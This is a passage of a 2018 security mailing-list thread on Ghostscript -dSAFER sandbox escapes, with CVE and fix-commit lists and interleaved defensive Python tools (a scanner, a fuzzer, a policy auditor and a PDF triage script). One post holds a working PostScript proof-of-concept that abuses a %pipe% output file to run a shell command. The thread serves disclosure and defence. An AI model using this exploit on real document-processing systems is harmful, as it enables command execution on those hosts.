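                          ("benign", BENIGN)):
        print("%-18s suspicious=%s findings=%s"
              % (label, is_suspicious(sample), scan(sample)))
```

The scanner is intentionally conservative about what it strips: it only removes comments, not strings, because `%pipe%` and `/OutputFile` are meaningful precisely when they appear as string or name operands. A run-encoded or otherwise obfuscated job will evade it, which is one more reason the policy.xml rules above are the real control.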
Tavis Ormandy
2018-08-29 20:43:22 UTC
Permalink
I should note, just add `userdict /setpagedevice undef` at the top if you
want to test it with ImageMagick.

Tavis.
Marcus Meissner
2018-09-03 10:57:47 UTC
Permalink
Hi,

I am still holding back CVE requesting as CERT promised to do this.

If they do not reply with a plan by tomorrow I will proceed with requesting.

Ciao, Marcus
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <***@suse.de>
Tavis Ormandy
2018-09-04 18:47:58 UTC
Permalink
Thanks Marcus. FWIW, over the weekend upstream fixed all of the bugs I had
opened. Just looking this morning and I can see one or two of the fixes
were incomplete, I'll file new bugs and hopefully new fixes make it into
9.24 release.

(I'm only fuzzing with sort -R < postscript_commands.txt | gs -dSAFER, so
totally possible we'll have to do this again soon)

Tavis.

(p.s. I'm not exaggerating about the sort -R, that's literally how I'm
fuzzing it)
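The fuzzing Tavis describes above is a random permutation of an operator list fed to `gs -dSAFER`. The following is an added example and not his harness: a small loop in the same spirit that writes each random job to a file, runs it under `-dSAFER` with a null output device, and keeps only the jobs that killed the interpreter with a signal or hung it. The operator list is a constructed stand-in for `postscript_commands.txt` (a handful of tokens drawn from the bugs in this thread); the `gs` flags used are the documented `-q -dSAFER -dNOPAUSE -dBATCH -sDEVICE=ppmraw -sOutputFile=/dev/null -f`. Negative return codes from `subprocess.run` are the terminating signal, which is what the triage label is built from.

```python
"""Random-operator fuzzing of gs -dSAFER with signal/hang triage.

Added example for this thread; not the harness described above.  The
operator list is a constructed stand-in for postscript_commands.txt.
"""
import os
import random
import signal
import subprocess
import tempfile

# Constructed: tokens that feature in the bugs discussed in this thread.
OPERATORS = [
    "save", "restore", "grestore", "gsave", "stopped", "pop", "null",
    "currentpagedevice", "/HWResolution", "get", "0", "(foobar)", "put",
    "<< /Whatever 16#41414141 >>", "setpattern", "setcolor", "{", "}", "if",
    "mark", "currentdevice", "getdeviceprops", ".dicttomark", "a0", "legal",
    "showpage", "setpagedevice", "clear", "cleartomark",
]

GS_FLAGS = ["-q", "-dSAFER", "-dNOPAUSE", "-dBATCH",
            "-sDEVICE=ppmraw", "-sOutputFile=/dev/null"]


def make_case(rng=None, length=12, operators=OPERATORS):
    """Build one job: a random selection of `length` tokens, one per line,
    so the offending line of a crashing job is easy to read off."""
    if rng is None:
        rng = random.Random()
    tokens = rng.sample(operators, min(length, len(operators)))
    return "%!PS\n" + "\n".join(tokens) + "\n"


def classify(returncode):
    """Map an exit status to a triage label.

    subprocess reports death-by-signal as a negative return code; anything
    non-negative is an ordinary exit (gs returns non-zero for PostScript
    errors, which are not interesting here).
    """
    if returncode >= 0:
        return "exit:%d" % returncode
    sig = -returncode
    try:
        name = signal.Signals(sig).name
    except ValueError:
        name = "SIG%d" % sig
    return "signal:" + name


def run_case(ps_source, gs="gs", timeout=10):
    """Write the job to a temp file, run it under -dSAFER, return
    (label, path).  A hang is reported as 'timeout'."""
    with tempfile.NamedTemporaryFile("w", suffix=".ps", delete=False) as f:
        f.write(ps_source)
        path = f.name
    cmd = [gs] + GS_FLAGS + ["-f", path]
    try:
        proc = subprocess.run(cmd, stdin=subprocess.DEVNULL,
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout)
        return classify(proc.returncode), path
    except subprocess.TimeoutExpired:
        return "timeout", path


def interesting(label):
    """Keep reproducers only for signal deaths and hangs."""
    return label.startswith("signal:") or label == "timeout"


def fuzz(iterations=200, seed=None, gs="gs"):
    """Run the loop and return [(label, path)] for the jobs worth keeping;
    uninteresting job files are deleted."""
    rng = random.Random(seed)
    kept = []
    for _ in range(iterations):
        label, path = run_case(make_case(rng), gs=gs)
        if interesting(label):
            kept.append((label, path))
        else:
            os.unlink(path)
    return kept


if __name__ == "__main__":
    for label, path in fuzz(iterations=50, seed=1):
        print(label, path)
```

Run it against a build with AddressSanitizer to turn silent memory corruption into SIGABRT, and keep the `gs` argument pointing at the build under test rather than the system binary. This loop only finds crashes and hangs; the sandbox escapes in this thread exit cleanly, so a separate check (for example, a canary command behind `%pipe%` that writes a file the loop then looks for) is needed to catch those.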
Tavis Ormandy
2018-09-04 19:59:23 UTC
Permalink
OK, well, the fixes missed 9.24 so vendors will have to either ship patches
once they land or wait for 9.25.

$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)

Let me know if anyone wants that testcase.

Tavis.
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling
undefinedfilename
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without
`PS2:' or
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
`PS3:' prefixes according `convert -debug Policy -log "%e"' it
seems
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g.
"%!PS-Adobe"). It
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then
be
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am
using at
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409
Nuernberg; Zi.
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
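The policy.xml workaround Leonardo and Bob discuss above (deny the Ghostscript-backed coders) and Bob's point that header magic, not the extension, decides which coder a file reaches, as an added audit script that is not code from the thread, from ImageMagick or from Ghostscript. The header magic values are the author's reading of ImageMagick's magic.xml, the "strictest match" rule is the script's own, and the sample policy is constructed.

```python
"""Audit an ImageMagick policy.xml for the Ghostscript-backed coders.

Added example: checks the VU#332928 workaround (deny the PS, PS2, PS3,
EPS, PDF and XPS coders) and models header-magic routing. Assumptions:
magic values from ImageMagick's magic.xml as the author reads it, and a
strict "every matching entry must deny read" rule chosen for auditing.
"""
import fnmatch
import re
import sys
import xml.etree.ElementTree as ET

# Coders that hand their input to Ghostscript, as listed in the thread.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS")


def expand_braces(pattern):
    """Expand {A,B,C} alternations policy.xml accepts: "{PS,PS2}" -> ["PS", "PS2"]."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    expanded = []
    for alt in m.group(1).split(","):
        expanded.extend(expand_braces(pattern[:m.start()] + alt.strip() + pattern[m.end():]))
    return expanded


def coder_rules(policy_xml):
    """Return [(patterns, rights)] for every <policy domain="coder"> entry."""
    rules = []
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("domain", "").strip().lower() != "coder":
            continue
        rights = {t.strip().lower() for t in pol.get("rights", "").split("|") if t.strip()}
        rules.append((expand_braces(pol.get("pattern", "")), rights))
    return rules


def denies_read(rights):
    """rights="none", or any explicit rights set without "read", blocks decoding."""
    return bool(rights) and "read" not in rights


def unblocked_gs_coders(policy_xml):
    """Return the GS_CODERS the policy still lets convert(1) decode.

    Strict rule (the script's own): a coder counts as blocked only if at least
    one coder entry matches it and every matching entry denies read. Anything
    else, including no matching entry at all, is reported as unblocked.
    """
    rules = coder_rules(policy_xml)
    unblocked = []
    for coder in GS_CODERS:
        matching = [rights for patterns, rights in rules
                    if any(fnmatch.fnmatchcase(coder, p.upper()) for p in patterns)]
        if not matching or not all(denies_read(r) for r in matching):
            unblocked.append(coder)
    return unblocked


def gs_coder_by_magic(data):
    """Coder that header sniffing would pick for these bytes, or None.

    Assumed magic (author's reading of magic.xml): "%PDF-" at offset 0 is PDF;
    "%!" at offset 0 or "%!PS-Adobe" at offset 1 is PS. EPS files start with
    "%!PS-Adobe-x.y EPSF-x.y", so they land in PS as well.
    """
    if data.startswith(b"%PDF-"):
        return "PDF"
    if data.startswith(b"%!") or data[1:].startswith(b"%!PS-Adobe"):
        return "PS"
    return None


def would_reach_ghostscript(policy_xml, filename, data):
    """True if convert(1) under this policy would feed the file to Ghostscript.

    Header magic decides first; the extension is only the fallback hint, which
    is the behaviour Bob describes for files without a PostScript header.
    """
    coder = gs_coder_by_magic(data)
    if coder is None:
        ext = filename.rsplit(".", 1)[-1].upper() if "." in filename else ""
        coder = ext if ext in GS_CODERS else None
    return coder is not None and coder in unblocked_gs_coders(policy_xml)


# Constructed sample: remembers the PostScript coders but not PDF or XPS.
SAMPLE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3}" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="read | write" pattern="PDF" />
  <policy domain="resource" name="memory" value="256MiB" />
</policymap>
"""

if __name__ == "__main__":
    # Usage: audit_policy.py /path/to/policy.xml (defaults to the constructed sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_POLICY
    for coder in unblocked_gs_coders(text):
        print('coder %s is not denied; add <policy domain="coder" rights="none" pattern="%s" />'
              % (coder, coder))
```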
Brandon Perry
2018-09-04 20:02:22 UTC
Permalink
Post by Tavis Ormandy
OK, well, the fixes missed 9.24 so vendors will have to either ship patches
once they land or wait for 9.25.
$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)
Let me know if anyone wants that testcase.
Hey Tavis, could I have a copy of the test case please? Thanks so much.
Post by Tavis Ormandy
Tavis.
Post by Tavis Ormandy
Thanks Marcus. FWIW, over the weekend upstream fixed all of the bugs I had
opened. Just looking this morning and I can see one or two of the fixes
were incomplete, I'll file new bugs and hopefully new fixes make it into
9.24 release.
(I'm only fuzzing with sort -R < postscript_commands.txt | gs -dSAFER, so
totally possible we'll have to do this again soon)
Tavis.
(p.s. I'm not exaggerating about the sort -R, that's literally how I'm
fuzzing it)
Post by Marcus Meissner
Hi,
I am still holding back CVE requesting as CERT promised to do this.
If they do not reply with a plan until tomorrow I will proceed with requesting.
Ciao, Marcus
Tavis Ormandy
2018-09-04 20:08:57 UTC
Permalink
Post by AmitB
Post by Tavis Ormandy
OK, well, the fixes missed 9.24 so vendors will have to either ship patches
once they land or wait for 9.25.
$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)
Let me know if anyone wants that testcase.
Hey Tavis, could I have a copy of the test case please? Thanks so much.
Sure, here it is.

Thanks, Tavis.
Tavis Ormandy
2018-09-05 18:02:48 UTC
Permalink
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can be
bypassed, so filed another bug for that (the new bug is 699718).

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)


I would like to re-emphasize that while Ghostscript is very capable and
mature software, I consider the -dSAFER sandbox to be a fragile security
boundary and that we should consider deprecating (or minimizing the use of)
untrusted postscript.

Tavis.
Perry E. Metzger
2018-09-05 19:01:28 UTC
Permalink
Post by Tavis Ormandy
I would like to re-emphasize that while Ghostscript is very capable
and mature software, I consider the -dSAFER sandbox to be a fragile
security boundary and that we should consider deprecating (or
minimizing the use of) untrusted postscript.
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security flaws
in just -dSAFER or is it overall security bugs? If it's the former,
given how few things actually need any of the features past what
-dSAFER offers, perhaps compiling the code by default without any such
capabilities would work well? You can't run what isn't there.

Perry
--
Perry E. Metzger ***@piermont.com
Stuart Gathman
2018-09-05 19:13:53 UTC
Permalink
Post by Perry E. Metzger
Post by Tavis Ormandy
I would like to re-emphasize that while Ghostscript is very capable
and mature software, I consider the -dSAFER sandbox to be a fragile
security boundary and that we should consider deprecating (or
minimizing the use of) untrusted postscript.
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security flaws
in just -dSAFER or is it overall security bugs? If it's the former,
given how few things actually need any of the features past what
-dSAFER offers, perhaps compiling the code by default without any such
capabilities would work well? You can't run what isn't there.
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying only on
the SAFER sandbox is a very bad idea.

What I need to study is whether random PDF files from the internet (as
opposed to general postscript) are therefore malware vectors.  I thought
that PDF used a restricted subset of operations that "rendered" it not a
general purpose language and therefore "safe".   But if SAFER was the
implementation of that restricted subset, then all internet PDFs are
suspect.
Perry E. Metzger
2018-09-06 00:37:19 UTC
Permalink
Post by Stuart Gathman
Post by Perry E. Metzger
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security
flaws in just -dSAFER or is it overall security bugs? If it's the
former, given how few things actually need any of the features
past what -dSAFER offers, perhaps compiling the code by default
without any such capabilities would work well? You can't run what
isn't there.
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying
only on the SAFER sandbox is a very bad idea.
I know it's a general purpose language, but if you ifdef out *all* the
IO (except to the page) and all system calls and the like from the
implementation, there's limits to what it can do. As it stands the
implementation has all those capabilities in the code, but does
anything anyone cares about actually need any of them under any
normal circumstances? If not, they can just be removed, which is a
lot easier to audit than a sandbox.

Perry
--
Perry E. Metzger ***@piermont.com
Leonid Isaev
2018-09-05 23:32:20 UTC
Permalink
Post by Stuart Gathman
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying only on
the SAFER sandbox is a very bad idea.
What I need to study, is whether random PDF files from the internet (as
opposed to general postscript) are therefore malware vectors.  I thought
that PDF used a restricted subset of operations that "rendered" it not a
general purpose language and therefore "safe".   But if SAFER was the
implementation of that restricted subset, then all internet PDFs are
suspect.
In addition to that, pdf files can contain things like javascript... There are
some python tools to analyze them and detect (even obfuscated JS) -- see [1]
and links therein. But yes, unless you generate a pdf/ps file yourself (e.g.
with pdflatex or a graphics program), you should consider it untrusted.

Cheers,
L.

[1] https://stackoverflow.com/questions/29342542/how-can-i-extract-a-javascript-from-a-pdf-file-with-a-command-line-tool
--
Leonid Isaev
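The kind of check Leonid refers to, as an added example rather than one of the tools he links: a pdfid-style scan of a PDF for the names that introduce JavaScript or automatic actions, which also undoes the #xx hex escapes PDF allows inside names (the obfuscation a plain grep for "/JavaScript" misses). The flagged-name set and both sample PDFs are the author's own constructions.

```python
"""Triage a PDF for embedded JavaScript and auto-run actions.

Added example (not one of the tools linked above). It scans raw bytes for
the name objects that introduce scripts or automatic actions, normalising
#xx hex escapes first. Compressed object streams are not decoded, so the
result says when /ObjStm was seen and content may have been missed.
"""
import re
import sys

# Names that introduce script or automatic behaviour (PDF action dictionaries);
# the selection is the author's choice.
FLAGGED_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile")

# A name object: "/" followed by regular characters; whitespace and delimiters end it.
_NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]*")
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(token):
    """Undo #xx escapes so b"/J#61vaScript" compares equal to b"/JavaScript"."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token)


def count_names(data):
    """Count each flagged name in the raw bytes, and how many were hex-escaped."""
    counts = dict.fromkeys(FLAGGED_NAMES, 0)
    obfuscated = 0
    for m in _NAME_TOKEN.finditer(data):
        raw = m.group(0)
        name = normalize_name(raw).decode("latin-1")
        if name in counts:
            counts[name] += 1
            if b"#" in raw:
                obfuscated += 1
    return counts, obfuscated


def triage(data):
    """Return human-readable findings; an empty list means nothing was flagged."""
    counts, obfuscated = count_names(data)
    findings = []
    if counts["/JavaScript"] or counts["/JS"]:
        findings.append("contains JavaScript")
    if counts["/OpenAction"] or counts["/AA"]:
        findings.append("has automatic actions (run on open or on page events)")
    if counts["/Launch"]:
        findings.append("has a Launch action (starts an external program)")
    if counts["/EmbeddedFile"]:
        findings.append("carries embedded files")
    if obfuscated:
        findings.append("%d flagged name(s) were hex-escaped, a common evasion" % obfuscated)
    if b"/ObjStm" in data:
        findings.append("uses object streams; compressed objects were not inspected")
    return findings


# Constructed sample: a one-page PDF whose OpenAction is a JavaScript action with
# both names hex-escaped (/J#61vaScript is /JavaScript, /J#53 is /JS).
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /J#61vaScript /J#53 (app.alert(1)) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample with nothing to flag.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    # Usage: pdf_triage.py file.pdf (defaults to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for line in triage(data) or ["nothing flagged"]:
        print(line)
```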
Jakub Wilk
2018-09-06 13:17:25 UTC
Permalink
Post by Leonid Isaev
pdf files can contain things like javascript...
Do any open-source PDF browsers actually execute embedded JS?
--
Jakub Wilk
Leonid Isaev
2018-09-06 16:21:09 UTC
Permalink
Post by Jakub Wilk
Post by Leonid Isaev
pdf files can contain things like javascript...
Do any open-source PDF browsers actually execute embedded JS?
Currently, evince, okular and gv don't. The same goes for zathura with its
poppler backend (haven't checked this, but pretty sure). But then there is also
Artifex Mupdf which, AFAIR, supports JS in pdf files (by extension, so does
zathura when viewing a pdf file using the mupdf plugin). I don't know how
complete that support is. Most importantly, many Android pdf/ebook readers
probably include JS support.

Cheers,
L.
--
Leonid Isaev
Tavis Ormandy
2018-09-09 19:27:26 UTC
Permalink
[resending post that bounced]

Another update, that bypass is now fixed with these commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002

The problem was that the previous
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4> commit
relied on catching any errors, then restoring a sane state in the error
handler. That won't work, because the trusted code shares the same operand
stack with untrusted code, so you can (for example) just fill it up with
junk and cause a stack overflow. That causes the stopped proc to stop,
leaving the page device in insecure state ("stopped" is the PostScript
equivalent of "threw an exception").

Here is a test case:

%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving
% page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a
% /stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)

I dunno if I believe there are no other ways to make that fail, I'll think
about it. I can see there are a bunch more security related commits in git
that are not from my reports, so I guess there are more on the way anyway.

Tavis.
Tavis Ormandy
2018-09-09 19:26:01 UTC
Permalink
Post by Tavis Ormandy
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can be
bypassed, so filed another bug for that (the new bug is 699718).
I see <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
is now closed. As far as I can tell, these are the (only) commits
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5812b1b78fc4d36fdc293b7859de69241140d590
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002fb9c131313253c307cf3951b3d47
Which are all variations of CVE-2018-16509. Is my understanding correct?
Yes, I think that's enough for all the issues I reported. There are some
more security commits in git (like this one
<http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=fb713b3818b52d8a6cf62c951eba2e1795ff9624>)
that are not from me though. That one in particular seems like a good idea,
errordict is like window.onerror in PostScript, a top-level exception
handler. It's hard to believe there are many legitimate untrusted documents
using complex exception handling logic ¯\_(ツ)_/¯
Many thanks to Tavis and P0 for finding these and keeping us in the
loop!
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e914f1da46e33decc534486598dc3eadf69e6efb
Marcus Meissner
2018-09-11 06:04:36 UTC
Permalink
Post by Tavis Ormandy
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can be
bypassed, so filed another bug for that (the new bug is 699718).
I see <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
is now closed. As far as I can tell, these are the (only) commits
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5812b1b78fc4d36fdc293b7859de69241140d590
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002fb9c131313253c307cf3951b3d47
Which are all variations of CVE-2018-16509. Is my understanding correct?
Mitre has assigned CVE-2018-16802 to these 3 commits.

Ciao, Marcus

Marcus Meissner
2018-09-06 12:52:52 UTC
Permalink
Hi,
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
CVE-2018-16510
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
CVE-2018-16511
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6
# 699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
# 699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
# 699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
CVE-2018-16509
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
# 699655 - missing type checking in setcolor
CVE-2018-16513
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
# 699656 - LockDistillerParams boolean missing type checks
CVE-2018-15910
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
CVE-2018-16539
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
